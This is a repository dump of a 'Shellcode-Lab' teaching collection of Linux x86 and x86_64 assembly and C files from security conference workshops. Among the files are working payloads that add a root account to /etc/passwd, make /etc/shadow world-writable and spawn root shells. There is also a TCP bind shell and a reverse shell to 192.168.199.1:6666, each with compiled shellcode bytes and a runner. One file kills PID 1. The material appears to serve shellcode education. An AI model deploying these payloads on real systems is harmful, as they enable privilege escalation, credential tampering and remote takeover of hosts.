├── README.md ├── x86_32 ├── 0x1_SyscallBasics │ ├── 0x1_Shellcode-Lab_32Bit_Basics.pdf │ └── Example_Code │ │ ├── adduser_etc_passwd.asm │ │ ├── ascii_converter.py │ │ ├── ascii_converter2.py │ │ ├── bad_setuid_shell.asm │ │ ├── chmod_shadow_0bytes.asm │ │ ├── chmod_shadow_no0.asm │ │ ├── crypt_des_tool.py │ │ ├── shell.c │ │ ├── skeleton_mmap.c │ │ └── skeleton_oldschool.c └── 0x2_NetworkShells │ ├── 0x2_ShellcodeLab_32Bit_NetworkShells.pdf │ ├── bindshell_tcp │ ├── bindtcp.asm │ ├── build_x86.sh │ └── testit.c │ └── reverseshell_tcp │ ├── build_x86.sh │ ├── revtcp.asm │ └── testit.c └── x86_64 ├── Example_Code ├── 8bit.asm ├── byte_placement_r10.asm ├── byte_placement_rax.asm ├── clear_register.asm ├── execve.asm ├── execve_setuid.asm ├── exit.asm ├── exit_nulls.asm ├── kill.asm ├── kill_noexit.asm ├── push.asm ├── push_mov.asm ├── skeleton.c └── xchg.asm └── Shellcode-Lab64_0x01.pdf /README.md: -------------------------------------------------------------------------------- 1 | # SHELLCODE-LAB 2 | ``` 3 | _____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____ 4 | / ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \ 5 | ( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o ) 6 | \__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || | 7 | / \ || | || [_ | || / \_ | || || [_|_____|| || _ || O | 8 | \ || | || || || \ || || || | | || | || | 9 | \___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____| 10 | ``` 11 | 12 | Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes. 13 | 14 | * x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs 15 | * x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit Intel CPUs 16 | 17 | Ch33rs 18 | dash 19 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0decave/Shellcode-Lab/7632784cec8b436390e5e223726155991dc67458/x86_32/0x1_SyscallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/adduser_etc_passwd.asm: -------------------------------------------------------------------------------- 1 | ; shellcode lab @ hack4 2 | ; dash 3 | 4 | BITS 32 5 | global _start 6 | 7 | _start: 8 | xor eax, eax 9 | xor ebx, ebx 10 | xor ecx, ecx 11 | 12 | mov eax, 5 13 | push ebx 14 | push 0x64777373 15 | push 0x61702f63 16 | push 0x74652f2f 17 | mov ebx, esp 18 | mov ecx, 0x401 19 | int 0x80 20 | 21 | ; take filedescriptor 22 | xor ebx, ebx 23 | mov ebx, eax 24 | 25 | ; write(f_open, line, 24) 26 | xor eax, eax 27 | xor ecx, ecx 28 | mov eax, 4 29 | 30 | push ecx 31 | push byte 0x0a 32 | push 0x68736162 33 | push 0x2f6e6962 34 | push 0x2f3a746f 35 | push 0x6f722f3a 36 | push 0x3a303a30 37 | push 0x3a494e73 38 | push 0x386b5a39 39 | push 0x65736d48 40 | push 0x42413a72 41 | push 0x336b6361 42 | push 0x68316f6e 43 | mov ecx, esp 44 | mov edx, 45 45 | int 0x80 46 | 47 | ;close maybe?? ah forget that :> 48 | 49 | ; exit(23) 50 | mov eax, 1 51 | mov ebx, 23 52 | int 0x80 53 | 54 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/ascii_converter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # ascii converter for shellcoding-lab at hack4 4 | # ~dash in 2014 5 | # 6 | 7 | import sys 8 | import binascii 9 | 10 | text = sys.argv[1] 11 | 12 | def usage(): 13 | print "./%s " % (sys.argv[0]) 14 | if len(sys.argv)<2: 15 | usage() 16 | exit() 17 | 18 | val = binascii.hexlify(text[::-1]) 19 | 20 | print "Stringlen: %d" % len(text) 21 | print "String: %s" % val 22 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/ascii_converter2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | import binascii 5 | 6 | text = sys.argv[1] 7 | 8 | def usage(): 9 | print "./%s " % (sys.argv[0]) 10 | if len(sys.argv)<2: 11 | usage() 12 | exit() 13 | 14 | val = binascii.hexlify(text[::-1]) 15 | 16 | print "Stringlen: %d" % len(text) 17 | print "String: %s" % val 18 | print 19 | for i in range(len(val)): 20 | if i % 8 == 0: 21 | print "push 0x", 22 | 23 | print "\b%c" % val[i], 24 | i=i+1 25 | k = i % 8 26 | if k == 0: 27 | print 28 | 29 | 30 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/bad_setuid_shell.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | _start: 5 | 6 | ;setuid 7 | xor eax, eax 8 | mov ebx, eax 9 | mov eax, 11 10 | int 0x80 11 | 12 | ;execve 13 | xor ecx, ecx 14 | push ecx 15 | push 0x69732f2f 16 | push 0x6e69622f 17 | mov ebx, esp 18 | mov edx, 0x00000000 19 | xor eax, eax 20 | mov eax, 11 21 | int 0x80 22 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_0bytes.asm: -------------------------------------------------------------------------------- 1 | ; shellcodelab@hack4 2 | ; by dash 3 | 4 | BITS 32 5 | global _start 6 | 7 | _start: 8 | xor eax, eax 9 | xor ebx, ebx 10 | xor ecx, ecx 11 | 12 | ;chmod 13 | mov ecx, 0x1ff ;0777 14 | push ebx ;null terminator 15 | push 0x776f6461 ;/etc/shadow 16 | push 0x68732f63 17 | push 0x74652f2f 18 | mov ebx, esp ;put the address of esp to ebx (shadow) 19 | mov eax, 15 20 | int 0x80 21 | 22 | ;exit 23 | xor eax, eax 24 | xor ebx, ebx 25 | mov eax, 1 26 | int 0x80 27 | 28 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_no0.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab@hack4 2 | ; by dash 3 | 4 | BITS 32 5 | global _start 6 | 7 | _start: 8 | xor eax, eax 9 | xor ebx, ebx 10 | xor ecx, ecx 11 | 12 | ;chmod 13 | mov cx, 0x1ff ;0777 14 | push ebx ;null terminator 15 | push 0x776f6461 ;/etc/shadow 16 | push 0x68732f63 17 | push 0x74652f2f 18 | mov ebx, esp ;put the address of esp to ebx (shadow) 19 | mov al, 15 20 | int 0x80 21 | 22 | ;exit 23 | xor eax, eax 24 | xor ebx, ebx 25 | mov al, 1 26 | int 0x80 27 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/crypt_des_tool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # 3 | # crypt des tool for shellcoding lab at hack4 4 | # ~dash 5 | 6 | import sys 7 | import crypt 8 | 9 | def usage(): 10 | print "%s " % (sys.argv[0]) 11 | 12 | if len(sys.argv)<2: 13 | usage() 14 | exit() 15 | 16 | password = sys.argv[1] 17 | pw = crypt.crypt(password,'AB') 18 | print "Password: %s" % pw 19 | 20 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/shell.c: -------------------------------------------------------------------------------- 1 | /* shell.c 2 | simple shell for shellcoding-lab at hack4 0x1 3 | probably ripped somewhere 4 | ~dash 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | int main(){ 13 | 14 | char *args[2]; 15 | 16 | setuid(0); 17 | args[0] = "/bin/sh"; 18 | args[1] = NULL; 19 | execve(args[0], args, NULL); 20 | } 21 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/skeleton_mmap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | char shellcode[] = ""; 5 | 6 | int main(int argc, char **argv) 7 | { 8 | // Allocate some read-write memory 9 | void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 10 | 11 | // Copy the shellcode into the new memory 12 | memcpy(mem, shellcode, sizeof(shellcode)); 13 | 14 | // Make the memory read-execute 15 | mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC); 16 | 17 | // Call the shellcode 18 | int (*func)(); 19 | func = (int (*)())mem; 20 | (int)(*func)(); 21 | 22 | // Now, if we managed to return here, it would be prudent to clean up the memory: 23 | munmap(mem, sizeof(shellcode)); 24 | 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /x86_32/0x1_SyscallBasics/Example_Code/skeleton_oldschool.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | unsigned char shellcode[] = ""; 4 | 5 | int main() 6 | { 7 | printf("Shellcode Length: %ld\n", sizeof(shellcode) - 1); 8 | int (*ret)() = (int(*)())shellcode; 9 | ret(); 10 | } 11 | 12 | 13 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0decave/Shellcode-Lab/7632784cec8b436390e5e223726155991dc67458/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | global _start 3 | 4 | ; basic bindshell for shellcode lab 5 | ; by dash 6 | 7 | _start: 8 | ; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h 9 | ; in difference we have to specify everything via socketcall 10 | ; int socketcall(int call, unsigned long *args); 11 | ; 66h / 102 is socketcall 12 | ; /usr/include/linux/net.h 13 | 14 | ; we need a socket, PF_INET, SOCK_STREAM, IPPROTO 15 | ; its *not* sys/socket 16 | ; go to /usr/include/bits/socket.h for domain 17 | ; go to /usr/include/bits/socket_type.h for type 18 | ; go to /usr/include/netinet/in.h for protocol 19 | 20 | ; define socket 21 | xor eax, eax ; clean accumulator 22 | xor ebx, ebx 23 | xor edx, edx ; prepare edx for null 24 | mov al, 0x66 25 | mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h) 26 | push edx ; IPPROTO == 0 27 | push 0x1 ; SOCK_STREAM == 1 28 | push 0x2 ; AF_INET / PF_INET == 2 29 | mov ecx,esp 30 | int 0x80 31 | 32 | ; define bind 33 | ; EAX has socket fd 34 | ; /usr/include/linux/in.h 35 | ; #define __SOCK_SIZE__ 16 /* sizeof(struct sockaddr) */ 36 | ; typedef unsigned short int sa_family_t; 37 | ; struct sockaddr { 38 | ; sa_family_t sa_family; unsigned short int 2 byte 39 | ; char sa_data[14]; } 40 | 41 | ; we do not want to specify a special ip address 42 | ; we simply define 0.0.0.0 with nulled register 43 | xchg edi, eax 44 | push edx ; 0.0.0.0 45 | push word 0x0A1A ; PORT 6666 46 | push word 0x2 ; AF_INET, sin_family 47 | mov ecx, esp ; struct sockaddr *addr 48 | mov esi, ecx ; save struct sockaddr for later use in ESI 49 | push 0x10 ; socklen_t addrlen 50 | push ecx ; sockaddr *addr 51 | push edi ; socket fd 52 | mov ecx, esp 53 | mov bl,0x2 ; SYS_BIND 54 | xor eax, eax ; clean accumulator 55 | mov al,0x66 ; SYS_SOCKETCALL 56 | int 0x80 57 | 58 | ; define listen 59 | ; do socketcall 60 | ; SYS_LISTEN 4 61 | ; int listen(int sockfd, int backlog); 62 | ; 63 | xor eax, eax 64 | mov al,0x66 ; SYS_SOCKETCALL 65 | mov bl,0x4 ; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL 66 | push 0x1 ; backlog 67 | push edi ; sockfd 68 | mov ecx, esp ; 2nd argument to SYS_SOCKETCALL 69 | int 0x80 70 | 71 | ; define accept 72 | ; SYS_ACCEPT 5 73 | ; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen); 74 | ; addr + addrlen for client, but we dont care about that 75 | 76 | xor eax, eax ; clean accumulator 77 | mov al,0x66 78 | mov bl,0x5 79 | push edx ; flags, null 80 | push edx 81 | push edi 82 | mov ecx, esp 83 | int 0x80 84 | 85 | ; define dup2 86 | ; dup2 duplicate the FDs to the shell 87 | ; new sockfd is in EAX 88 | ; int dup2(int oldfd, int newfd); 89 | 90 | xor ecx, ecx 91 | mov cl,0x2 92 | xchg ebx,eax 93 | loop: 94 | xor eax, eax ; clean accumulator 95 | mov al,0x3F 96 | int 0x80 97 | dec ecx 98 | jns loop ; if ecx is *not* -1 (SIGN Flag) 99 | 100 | ; define execve 101 | ; spawning a shell 102 | ; int execve(const char *filename, char *const argv[], char *const envp[]); 103 | ; 104 | 105 | xor eax, eax ; clean accumulator 106 | xor esi, esi 107 | push esi 108 | mov edx, esp ; 3rd argument 109 | push esi ; NULL 110 | push 0x68732f6e ; n/sh 111 | push 0x69622f2f ; //bi 112 | mov ebx, esp ; 1st argument 113 | mov ecx, edx ; 2nd argument 114 | mov al,0xb 115 | int 0x80 116 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # easy build script for shellcode class 3 | 4 | if [ $# -ne 1 ]; 5 | then 6 | echo "what is the name of the sourcefile, without .asm please" 7 | exit 8 | fi 9 | 10 | name=$1 11 | 12 | nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o 13 | md5sum $name 14 | ls -al $name 15 | echo "Done" 16 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/bindshell_tcp/testit.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | unsigned char shellcode[] = \ 4 | "\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x6a\x01\x57\x89\xe1\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x52\x52\x57\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80"; 5 | main() 6 | { 7 | printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); 8 | int (*ret)() = (int(*)())shellcode; 9 | ret(); 10 | } 11 | 12 | 13 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # easy build script for shellcode class 3 | 4 | if [ $# -ne 1 ]; 5 | then 6 | echo "what is the name of the sourcefile, without .asm please" 7 | exit 8 | fi 9 | 10 | name=$1 11 | 12 | nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o 13 | md5sum $name 14 | ls -al $name 15 | echo "Done" 16 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | global _start 3 | 4 | ; basic reverseshell for shellcode lab 5 | ; by dash 6 | 7 | _start: 8 | ; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h 9 | ; in difference we have to specify everything via socketcall 10 | ; int socketcall(int call, unsigned long *args); 11 | ; 66h / 102 is socketcall 12 | ; /usr/include/linux/net.h 13 | 14 | ; we need a socket, PF_INET, SOCK_STREAM, IPPROTO 15 | ; its *not* sys/socket 16 | ; go to /usr/include/bits/socket.h for domain 17 | ; go to /usr/include/bits/socket_type.h for type 18 | ; go to /usr/include/netinet/in.h for protocol 19 | 20 | ; define socket 21 | xor eax, eax ; clean accumulator 22 | xor ebx, ebx ; clean it as well 23 | xor edx, edx ; prepare edx for null 24 | mov al, 0x66 ; put 102 into AL, sys_socketcall 25 | mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h) 26 | push edx ; IPPROTO == 0 27 | push 0x1 ; SOCK_STREAM == 1 28 | push 0x2 ; AF_INET / PF_INET == 2 29 | mov ecx,esp 30 | int 0x80 31 | 32 | ; connect 33 | ; call is basically the same as bind 34 | ;xchg edi, eax 35 | push 0x01C7A8C0 ; 192.168.199.1 36 | push word 0x0A1A ; PORT 6666 37 | push word 0x2 ; AF_INET, sin_family 38 | mov ecx, esp ; struct sockaddr *addr 39 | mov esi, ecx ; save struct sockaddr for later use in ESI 40 | push 0x10 ; socklen_t addrlen 41 | push ecx ; sockaddr *addr 42 | push edi ; socket fd 43 | mov ecx, esp 44 | mov bl,0x3 ; SYS_CONNECT 45 | xor eax, eax ; clean accumulator 46 | mov al,0x66 ; SYS_SOCKETCALL 47 | int 0x80 48 | ; define dup2 49 | ; dup2 duplicate the FDs to the shell 50 | ; new sockfd is in EAX 51 | ; int dup2(int oldfd, int newfd); 52 | 53 | xor ecx, ecx 54 | mov cl,0x2 55 | mov ebx,edi 56 | loop: 57 | xor eax, eax ; clean accumulator 58 | mov al,0x3F 59 | int 0x80 60 | dec ecx 61 | jns loop ; if ecx is *not* -1 (SIGN Flag) 62 | 63 | ; define execve 64 | ; spawning a shell 65 | ; int execve(const char *filename, char *const argv[], char *const envp[]); 66 | ; 67 | 68 | xor eax, eax ; clean accumulator 69 | xor esi, esi 70 | push esi 71 | mov edx, esp ; 3rd argument 72 | push esi ; NULL 73 | push 0x68732f6e ; n/sh 74 | push 0x69622f2f ; //bi 75 | mov ebx, esp ; 1st argument 76 | mov ecx, edx ; 2nd argument 77 | mov al,0xb 78 | int 0x80 79 | -------------------------------------------------------------------------------- /x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | unsigned char shellcode[] = \ 4 | "\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80"; 5 | main() 6 | { 7 | printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); 8 | int (*ret)() = (int(*)())shellcode; 9 | ret(); 10 | } 11 | 12 | 13 | -------------------------------------------------------------------------------- /x86_64/Example_Code/8bit.asm: -------------------------------------------------------------------------------- 1 | ; 8 bit registers 'undocumented', test 2 | ; dash@hack4.org 3 | ; May 2016 4 | ; 5 | ; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode 6 | ; however, they are addressable 7 | ; just adding right now a l to 16bit registers 8 | ; 9 | 10 | BITS 64 11 | 12 | global _start 13 | _start: 14 | 15 | mov spl, 1 16 | mov bpl, 2 17 | mov sil, 3 18 | mov dil, 4 19 | -------------------------------------------------------------------------------- /x86_64/Example_Code/byte_placement_r10.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64bit 2 | ; dash@hack4.org 3 | ; byte placements on 64 bit - example for new register r10 4 | BITS 64 5 | global _start 6 | 7 | _start: 8 | 9 | ; former general purpose register 10 | sub r10, r10 11 | 12 | mov r10, 0x4142434445464748 13 | sub r10, r10 14 | 15 | mov r10d, 0x41424344 16 | sub r10d, r10d 17 | 18 | mov r10w, 0x4142 19 | sub r10w, r10w 20 | 21 | mov r10b,0x42 22 | sub r10b, r10b 23 | -------------------------------------------------------------------------------- /x86_64/Example_Code/byte_placement_rax.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64bit 2 | ; dash@hack4.org 3 | ; byte placements on 64 bit - example 4 | BITS 64 5 | global _start 6 | 7 | _start: 8 | 9 | ; former general purpose register, example 10 | ; sub is used to clear out the register 11 | sub rax, rax 12 | 13 | mov rax, 0x4142434445464748 14 | sub rax, rax 15 | 16 | mov eax, 0x41424344 17 | sub eax, eax 18 | 19 | ; address 16bit 20 | mov ax, 0x4142 21 | 22 | ; overwrite the higher byte of ax 23 | ; 0x4142 gets to 0x2d42 24 | mov ah,0x2d 25 | sub ah, ah 26 | 27 | mov al,0x41 28 | sub al, al 29 | -------------------------------------------------------------------------------- /x86_64/Example_Code/clear_register.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64 2 | ; dash@hack4.org 3 | ; 4 | 5 | ; some example to zero-out a register 6 | BITS 64 7 | global _start 8 | _start: 9 | 10 | xor rax, rax ; initial clearing - classic xor 11 | mov rax, 0xDEADBEEF 12 | sub rax, rax ; sub opcode 13 | 14 | mov rax, 0xF00DBABE 15 | xor rax, rax ; classic xor 16 | 17 | ; check value of register and add or sub from that 18 | ; let's assume 29A is in the register rcx 19 | sub rcx, rcx 20 | mov rcx, 0x29A 21 | sub rcx, 666 22 | ; zero'd 23 | -------------------------------------------------------------------------------- /x86_64/Example_Code/execve.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | global _start 3 | 4 | _start: 5 | 6 | xor rax, rax 7 | 8 | push rax ; null terminator for the string 9 | mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards 10 | push rbx ; 11 | mov rdi, rsp ; move address from stack pointer to first argument 12 | 13 | push rax 14 | push rdi ; actually we would not need this one 15 | mov rsi, rsp ; move the address to the 2nd argument 16 | 17 | mov rdx, rax ; no envp necessary 18 | 19 | mov al,0x3B ; execve into rax 20 | 21 | syscall 22 | -------------------------------------------------------------------------------- /x86_64/Example_Code/execve_setuid.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | global _start 3 | 4 | _start: 5 | 6 | xor rax, rax 7 | push rax ; push the cleared register 8 | pop rdi ; pop the zer0z into 1st argument 9 | 10 | add al,0x69 ; setuid 105 or 0x69h 11 | syscall ; call setuid(0) 12 | 13 | 14 | xor rax, rax 15 | 16 | push rax ; null terminator for the string 17 | mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards 18 | push rbx ; 19 | mov rdi, rsp ; move address from stack pointer to first argument 20 | 21 | push rax 22 | push rdi ; actually we would not need this one 23 | mov rsi, rsp ; move the address to the 2nd argument 24 | 25 | mov rdx, rax ; no envp necessary 26 | 27 | mov al,0x3B ; execve into rax 28 | 29 | syscall 30 | -------------------------------------------------------------------------------- /x86_64/Example_Code/exit.asm: -------------------------------------------------------------------------------- 1 | ; shellcode lab 64Bit 2 | ; exit example as it should be ;) 3 | ; dsah@hack4.org 4 | ; 5 | BITS 64 6 | global _start 7 | 8 | _start: 9 | 10 | xor rax,rax 11 | xor rdx,rdx 12 | mov al,0x3C 13 | mov dil,4 14 | syscall 15 | -------------------------------------------------------------------------------- /x86_64/Example_Code/exit_nulls.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab 64Bit 2 | ; dash@hack4.org 3 | ; exit code with null bytes 4 | ; 5 | 6 | BITS 64 7 | 8 | global _start 9 | 10 | _start: 11 | 12 | xor rax,rax 13 | xor rdx,rdx 14 | mov rax,0x3C 15 | mov rdx,4 16 | syscall 17 | -------------------------------------------------------------------------------- /x86_64/Example_Code/kill.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab 64Bit 2 | ; dash@hack4.org 3 | ; kill + exit 4 | ; 5 | 6 | 7 | BITS 64 8 | global _start 9 | 10 | _start: 11 | 12 | xor rax, rax 13 | xor rdi, rdi 14 | xor rsi, rsi 15 | 16 | 17 | mov dil, 1368 18 | mov sil,9 19 | mov al, 62 20 | syscall 21 | 22 | xor rax, rax 23 | xor rdi, rdi 24 | 25 | add dil, 4 26 | mov al, 60 27 | syscall 28 | -------------------------------------------------------------------------------- /x86_64/Example_Code/kill_noexit.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64bit 2 | ; dash@hack4.org 3 | ; don't execute that as root, as long as adjusted 4 | ; 5 | 6 | BITS 64 7 | global _start 8 | 9 | _start: 10 | 11 | xor rax, rax 12 | xor rdi, rdi 13 | xor rsi, rsi 14 | 15 | mov dil, 1 ; you might not want to run that as root 16 | mov sil,9 17 | mov al, 62 18 | syscall 19 | -------------------------------------------------------------------------------- /x86_64/Example_Code/push.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64 2 | ; dash@hack4.org 3 | ; push example and 8byte fun on 64bit architecture 4 | ; 5 | 6 | BITS 64 7 | 8 | global _start 9 | _start: 10 | 11 | push byte 0x41 12 | push word 0x4142 13 | push dword 0x41424344 14 | ; let's comment that out 15 | ; comment it in to see the compile error 16 | ;push 0x4142434445464748 17 | -------------------------------------------------------------------------------- /x86_64/Example_Code/push_mov.asm: -------------------------------------------------------------------------------- 1 | ; shellcode-lab64 2 | ; dash@hack4.org 3 | ; push example and 8byte fun on 64bit architecture 4 | ; use mov to bring up your 8byte value on the stack 5 | ; 6 | 7 | BITS 64 8 | 9 | global _start 10 | _start: 11 | 12 | xor rax, rax ; clear register 13 | mov rax, 0x4142434445464748 ; place 8byte in register rax 14 | push rax ; push it onto the stack 15 | -------------------------------------------------------------------------------- /x86_64/Example_Code/skeleton.c: -------------------------------------------------------------------------------- 1 | /* shellcode-lab 64Bit 2 | dash@hack4.org 3 | 4 | use -z execstack 5 | or set char code to const 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | unsigned char code[] ="shellcode wants to be placed here!"; 12 | main() 13 | { 14 | printf("Shellcode Len: %d\n", (int)strlen(code)); 15 | int (*ret)() = (int(*)())code; 16 | ret(); 17 | } 18 | -------------------------------------------------------------------------------- /x86_64/Example_Code/xchg.asm: -------------------------------------------------------------------------------- 1 | ; xchg example code 2 | ; dash@hack4.org 3 | ; shellcode lab 4 | ; may 2016 5 | 6 | BITS 64 7 | global _start 8 | 9 | _start: 10 | 11 | xor rax, rax 12 | xor rbx, rbx 13 | 14 | mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/ 15 | mov rbx, 0x539 16 | mov r10, 0xBEEFBEEFBEEFBEEF 17 | xchg rax, r10 18 | xchg r10, r9 19 | xchg rbx, rax 20 | xchg rdi,rsp 21 | -------------------------------------------------------------------------------- /x86_64/Shellcode-Lab64_0x01.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0decave/Shellcode-Lab/7632784cec8b436390e5e223726155991dc67458/x86_64/Shellcode-Lab64_0x01.pdf --------------------------------------------------------------------------------